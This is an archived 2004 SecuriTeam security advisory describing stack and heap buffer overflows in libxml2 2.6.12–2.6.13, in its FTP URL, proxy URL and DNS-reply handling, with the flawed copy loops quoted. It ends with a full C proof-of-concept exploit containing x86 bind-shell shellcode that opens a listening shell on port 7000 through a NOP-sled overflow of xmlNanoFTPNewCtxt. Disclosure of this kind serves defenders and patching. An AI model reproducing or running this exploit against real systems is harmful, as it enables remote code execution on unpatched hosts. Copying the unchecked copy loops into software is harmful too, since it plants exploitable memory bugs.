[NEWS] Libxml2 Remote Buffer Overflows
From: SecuriTeam (support_at_securiteam.com)
Date: 11/01/04
- Previous message: SecuriTeam: "[NT] MailCarrier SMTP EHLO/HELO Buffer Overflow (PoC)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 1 Nov 2004 09:21:38 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Libxml2 Remote Buffer Overflows
------------------------------------------------------------------------
SUMMARY
<http://www.xmlsoft.org/> Libxml2 is the XML C parser and toolkit
developed for the Gnome project (but usable outside of the Gnome
platform), it is free software available under the MIT License.
Several buffer overflows were found in various code portions in libxml2.
The overflows are not related to XML parsing but to a different parsing
code within libxml.
DETAILS
Vulnerable Systems:
* libxml2 version 2.6.12 and 2.6.13
Immune Systems:
* libxm2 version 2.6.15
* There is a buffer overflow when parsing a URL with FTP information in
it. A loop incorrectly copies data from a user supplied buffer into a
finite stack buffer with no regard for the length being copied.
* A buffer overflow exists when parsing a proxy URL with FTP information
in it. A loop incorrectly copies data from a user supplied buffer into a
finite stack buffer with no regard for the length being copied.
* There are multiple buffer overflows in the code that resolves names via
DNS. An attacker running a malicious DNS server, or an attacker on a LAN
spoofing DNS
replies could leverage these to execute code on the victim's computer.
Buffer overflow when parsing a URL with FTP information
The vulnerable code responsible for the this overflow is located in the
nanoftp.c source file, in the xmlNanoFTPScanURL():
while (cur[0] != ']')
buf[indx++] = *cur++;
Where 'buf' is a stack-allocated buffer and cur is the URL which the
attacker is able to control. The same loop is used throughout the code but
with proper checks, hence the same mistake is avoided:
while ((cur[0] != ']') && (indx < XML_NANO_MAX_URLBUF-1))
buf[indx++] = *cur++;
A sample proof of concept exploit is provided at the end of this advisory.
Buffer overflow when parsing a proxy URL with FTP information
As before, the vulnerable code is located in the nanoftp.c source file but
in the xmlNanoFTPScanProxy() function:
while (cur[0] != ']')
buf[indx++] = *cur++;
The same coding error as the one before causes the same type of buffer
overflow to occur.
Buffer overflows when handling DNS replies
There are two different functions, with three different code sections each
containing two overflows. However, these are not six buffer overflows
since two bugs are conditionally compiled only if two others are not.
The first two occur in the file nanoftp.c, lines 1110-1120, in the
xmlNanoFTPConnect() function. The function getaddrinfo() is called to
resolve a hostname and the returned info is then copied into a heap buffer
in a call to memcpy(). The copy length is taken from the DNS reply, rather
than using the size of the destination structure minimized against the
size of the reply.
The second set occur in nanohttp.c, lines 1070-1080, in the
xmlNanoHTTPConnectHost() function. Data from getaddrinfo() is again copied
incorrectly, this time into a local stack buffer.
The third set of overflows occurs in nanohttp.c, lines 1145-1155, in the
xmlNanoHTTPConnectHost() function. This time, gethostbyname() is called,
and data is again copied using memcpy() into a local stack buffer using
the DNS length instead of the destination structure size.
Note: Since these overflows are not related to the XML parsing code which
is used by 99% of the programs using libxml, these overflows might be hard
to exploit correctly.
Proof Of Concept
/*
* libxml 2.6.12 nanoftp bof POC infamous42mdAThotpopDOTcom
*
* [n00b@localho.outernet] gcc -Wall libsuxml.c -lxml2
* [n00b@localho.outernet] ./a.out
* Usage: ./a.out <retaddr> [ align ]
* [n00b@localho.outernet] netstat -ant | grep 7000
* [n00b@localho.outernet] ./a.out 0xbfff0360
* xmlNanoFTPScanURL: Use [IPv6]/IPv4 format
* [n00b@localho.outernet] netstat -ant | grep 7000
* tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <libxml/nanoftp.h>
#define die(x) do{ perror((x)); exit(1); }while(0)
#define BS 0x10000
#define NOP 0x90
#define NNOPS 3000
#define ALIGN 0
/* call them */
#define SHELL_LEN (sizeof(sc)-1)
char sc[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
/*
*/
int main(int argc, char **argv)
{
int x = 0, len = 0;
char buf[BS] = {'A',};
long retaddr = 0, align = ALIGN;
if(argc < 2){
fprintf(stderr, "Usage: %s <retaddr> [ align ]\n", argv[0]);
return EXIT_FAILURE;
}
if(sscanf(argv[1], "%lx", &retaddr) != 1)
die("sscanf");
if(argc > 2)
align = atoi(argv[2]);
if(align < 0 || align > 3)
die("nice try newblar");
strncpy(buf, "://[", 4);
len += 4;
memset(buf+len, NOP, NNOPS);
len += NNOPS;
memcpy(buf+len, sc, SHELL_LEN);
len += SHELL_LEN;
len += align;
for(x = 0; x < 2000 - (sizeof(retaddr) - 1); x += sizeof(retaddr))
memcpy(buf+len+x, &retaddr, sizeof(retaddr));
buf[len+x] = ']';
buf[len+x+1] = 0;
xmlNanoFTPNewCtxt(buf);
return EXIT_SUCCESS;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:infamous41md@hotpop.com>
sean.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] MailCarrier SMTP EHLO/HELO Buffer Overflow (PoC)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
